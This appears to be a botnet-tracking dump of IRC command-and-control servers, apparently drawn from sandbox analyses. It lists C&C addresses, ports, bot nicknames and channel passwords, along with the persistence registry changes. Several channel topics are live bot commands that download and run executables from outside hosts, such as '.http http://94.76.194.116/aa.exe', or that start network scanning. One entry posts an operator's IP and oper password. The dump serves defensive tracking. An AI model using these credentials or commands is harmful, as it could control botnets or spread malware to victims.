usb.123back.com

sb.123back.com 89.46.101.186
* C&C Server: 89.46.101.186:7000
* Server Password:
* Username: bwkpfn
* Nickname: rykrcm
* Channel: #n8# (Password: trb123trb)
* Channeltopic: :
Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2891BC5C0-4FCB-11cF-AAX5-81EX1F635612} "StubPath" = c:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\is32.exe
Reads
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
  HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
  HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
  HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
File

us.123back.com

us.123back.com 89.46.101.186
* C&C Server: 89.46.101.186:6667
* Server Password:
* Username: XP-9860
* Nickname: [DEU|00|P|20902]
* Channel: #us# (Password: hiphop)
* Channeltopic: :.nzel.start http://tamanjurong.sg/us9.exe C:\iusw.exe 1
Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "WindowsXPP" = ¿›Û¥oginWindow.exe
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "WindowsXPP" = ¿›Û¥oginWindow.exe
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "c:\IM.exe" = c:\IM.exe:*:Enabled:WindowsXPP
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "LogSessionName" = [REG_EXPAND_SZ, value: stdout]
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "Active" =

java.KUTLUFAMILY.COM(ms0608 net)

java.KUTLUFAMILY.COM 67.159.9.24
membres.lycos.fr membres.lycos.fr 213.131.252.251
Download URLs
  http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
* C&C Server: 67.159.9.24:81
* Server Password:
* Username: SP3-186
* Nickname: [N00_DEU_XP_8857119]xð@
* Channel: (Password: )
* Channeltopic:
* C&C Server: 67.159.9.24:80
* Server Password:
* Username: SP3-384
* Nickname: [00_DEU_XP_2207577]
* Channel: #aa (Password: )
* Channeltopic: :.asc -S -s |.http http://94.76.194.116/aa.exe |.asc exp_all

lebanonbt.info(arab lamer 6k net)

{"lebanonbt.info", 7000},
{"lebanonbt.info", 6667},
{"lebanonbt.info", 3211},
chanel: #lala
chanelpass: trb123trb
chanelusb: #usb

gs.unicatz.com

Remote Host      Port Number
gs.unicatz.com   2010

00000000 | 4E49 434B 2058 505C 4E73 6533 5C0A 5553 | NICK XP\Nse3\.US
00000010 | 4552 206C 614D 6572 2022 2220 2267 732E | ER laMer "" "gs.
00000020 | 756E 6963 6174 7A2E 636F 6D22 203A 0334 | unicatz.com" :.4
00000030 | B703 6CE0 0334 024D 0203 E972 0334 B720 | ..l..4.M...r.4.
00000040

Server : i5387D082.versanet.de

Remote Host      Port Number
66.252.13.208    17000

NICK XP|Cah2
USER laMer "" "flash.flassicensingservice.net" :You Think iaughty
USERHOST XP|Cah2
MODE XP|Cah2 +i
JOIN #lbl# lam
MODE #lbl#
PONG :i5387D082.versanet.de

Registry Modifications
* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC
  o HKEY_CURRENT_USER\Software\Microsoft\Microsoft Agent
  o HKEY_CURRENT_USER\Software\mIRC
  o HKEY_CURRENT_USER\Software\mIRC\DateUsed
* The newly created Registry Values are:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + WinXPService = "%Windir%\ie8\mplayer.pif"
      so that mplayer.pif runs

remove.brooklyn-bitches.com (JiMyGJ the albanian lamer again)

I removed so that lamer can't harm people anymore. Here are his infos:
remove.brooklyn-bitches.com 203.70.60.179
Opened listening TCP connection on port: 559
* C&C Server: 203.70.60.179:12351
* Server Password:
* Username: rjrnz
* Nickname: rjrnz
* Channel: #.u (Password: 1980)
* Channeltopic:
Here his real IP address and his oper passwd:
oper JiM1 { from { userhost

bbs.moiservice.com

66.252.13.212:16667
Nick: [AUT]XP-SP3[00]7380
Username: fmeslr
Joined Channel: #l# with Password lam
Channel Topic for Channel #l#: ".advscan asn445 120 5 0 -r -b -s"

us.unicatz.com

us.unicatz.com DNS_TYPE_A 66.252.13.214 1
66.252.13.214:2010
Nick: vnzznnsc
Username: vnzznnsc
Joined Channel: #us# with Password d0s

b3.scorevidic.net

b3.scorevidic.net 92.243.29.231
* C&C Server: 92.243.29.231:5900
* Server Password:
* Username: VirUs
* Nickname: VirUs-bxyjsayd
* Channel: (Password: )
* Channeltopic:
Registry Changes by all processes
Create or Open
Changes
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{13POP6M8-1MAD-24AD-JIM1-73OP5G2223335} "StubPath" = c:JAMACRAFTpop.exe
Reads
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
  HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
  HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
  HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
  HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting "DoReport"
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting